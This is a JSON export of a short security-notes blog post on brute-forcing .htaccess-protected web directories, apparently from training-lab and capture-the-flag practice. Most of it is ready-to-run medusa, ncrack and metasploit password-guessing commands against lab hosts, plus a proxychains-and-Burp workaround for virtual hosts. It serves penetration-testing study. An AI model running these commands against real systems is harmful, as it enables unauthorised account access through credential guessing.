{"id":548,"date":"2019-09-29T20:23:37","date_gmt":"2019-09-29T18:23:37","guid":{"rendered":"https:\/\/privat.andreas-klingler.de\/itsec\/?p=548"},"modified":"2023-12-20T19:38:09","modified_gmt":"2023-12-20T18:38:09","slug":"breaking-htaccess","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=548","title":{"rendered":"Breaking .htaccess"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">With Medusa<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Does\u00adn\u2019t seem to work with vir\u00adtu\u00adal&nbsp;hosts!<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">medusa -h 10.11.1.49 -u bethany -P Dog_Names_normalized.txt -M http -m DIR:\/~Public -T 2<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">With ncrack<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Does\u00adn\u2019t seem to work with vir\u00adtu\u00adal&nbsp;hosts!<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ncrack -vv --user bethany -P Dog_Names_normalized.txt http:\/\/10.11.1.49:9505 -m http:path=\/~Public\/<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">With metasploit<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Use mod\u00adule auxiliary\/scanner\/http\/http_login<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Virtual hosts<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">If Host head\u00aders are not supported:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Start Burp&nbsp;proxy<\/li>\n\n\n\n<li>Con\u00adfig\u00adure prox\u00ady\u00adchains to use Burp&nbsp;proxy.<\/li>\n\n\n\n<li>Prepend prox\u00ady\u00adchains before the com\u00admand and the requests are going through Burp. Example:&nbsp;<ul class=\"wp-block-list\">\n<li>\n<pre>proxychains medusa -s -h docker.registry.htb -u registry -P \/usr\/share\/wordlists\/rockyou.txt -M http -m DIR:v2\/_catalog -T 20<\/pre>\n<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>In Burp, con\u00adfig\u00adure head\u00ader modifications.<\/li>\n<\/ol>\n\n\n\n<h1 class=\"wp-block-heading\">More<\/h1>\n\n\n\n<ul class=\"wp-block-list\">\n<li>https:\/\/www.hackingarticles.in\/multiple-ways-to-exploiting-http-authentication\/<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>With Medusa Does\u00adn\u2019t seem to work with vir\u00adtu\u00adal&nbsp;hosts! medusa \u2011h 10.11.1.49 \u2011u bethany \u2011P Dog_Names_normalized.txt \u2011M http \u2011m <span class=\"caps\">DIR<\/span>:\/~Public \u2011T 2 With ncrack Does\u00adn\u2019t seem to work with vir\u00adtu\u00adal&nbsp;hosts! ncrack \u2011vv \u2013user bethany \u2011P Dog_Names_normalized.txt http:\/\/10.11.1.49:9505 \u2011m http:path=\/~Public\/ With metas\u00adploit Use mod\u00adule auxiliary\/scanner\/http\/http_login Vir\u00adtu\u00adal hosts If Host head\u00aders are not sup\u00adport\u00aded:&nbsp;More<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[470,475],"tags":[156,50,20,157,124,130,111,116,3],"class_list":["post-548","post","type-post","status-publish","format-standard","hentry","category-active-enum","category-attack-tool","tag-apache","tag-enumeration","tag-htaccess","tag-login","tag-medusa","tag-ncrack","tag-password","tag-web-server","tag-webserver"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/548","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=548"}],"version-history":[{"count":4,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/548\/revisions"}],"predecessor-version":[{"id":3817,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/548\/revisions\/3817"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=548"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=548"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=548"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}